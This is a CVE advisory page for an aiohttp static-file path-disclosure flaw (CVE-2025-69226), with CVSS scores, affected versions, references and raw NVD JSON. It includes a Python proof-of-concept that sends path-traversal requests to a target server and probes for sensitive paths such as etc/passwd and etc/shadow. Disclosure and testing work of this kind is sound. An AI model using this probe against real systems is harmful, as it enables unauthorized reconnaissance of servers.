CVE-2025-69226

Description

AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below enable an attacker to ascertain the existence of absolute path components through the path normalization logic for static files meant to prevent path traversal. If an application uses web.static() (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components. This issue is fixed in version 3.13.3.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:* - VULNERABLE

aiohttp <= 3.13.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import asyncio
import aiohttp

async def check_path_exists(base_url, path):
    """Check if a path component exists on the target server"""
    async with aiohttp.ClientSession() as session:
        # Try different path variations to detect existence
        test_paths = [
            f"{base_url}/static/../../../{path}",
            f"{base_url}/static/../../{path}",
            f"{base_url}/static/../{path}"
        ]
        
        for test_path in test_paths:
            try:
                async with session.get(test_path, timeout=5) as response:
                    # Analyze response to determine path existence
                    print(f"Path: {test_path}")
                    print(f"Status: {response.status}")
                    print(f"Content-Length: {response.headers.get('Content-Length', 'N/A')}")
            except Exception as e:
                print(f"Error testing {test_path}: {e}")

async def enumerate_paths(base_url):
    """Enumerate common system paths"""
    common_paths = [
        "etc/passwd",
        "etc/shadow",
        "var/log",
        "usr/local",
        "home",
        "root"
    ]
    
    for path in common_paths:
        await check_path_exists(base_url, path)
        await asyncio.sleep(0.5)

if __name__ == "__main__":
    target = "http://target-server:8080"
    asyncio.run(enumerate_paths(target))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69226
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69226
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69226/
[4] VulDB https://vuldb.com/cve/CVE-2025-69226
[5] https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e
[6] https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69226", "sourceIdentifier": "[email protected]", "published": "2026-01-05T23:15:40.913", "lastModified": "2026-01-14T19:16:23.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below enable an attacker to ascertain the existence of absolute path components through the path normalization logic for static files meant to prevent path traversal. If an application uses web.static() (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components. This issue is fixed in version 3.13.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.13.3", "matchCriteriaId": "715B630E-B141-4247-A920-3FFBD8045A05"}]}]}], "references": [{"url": "https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}]}}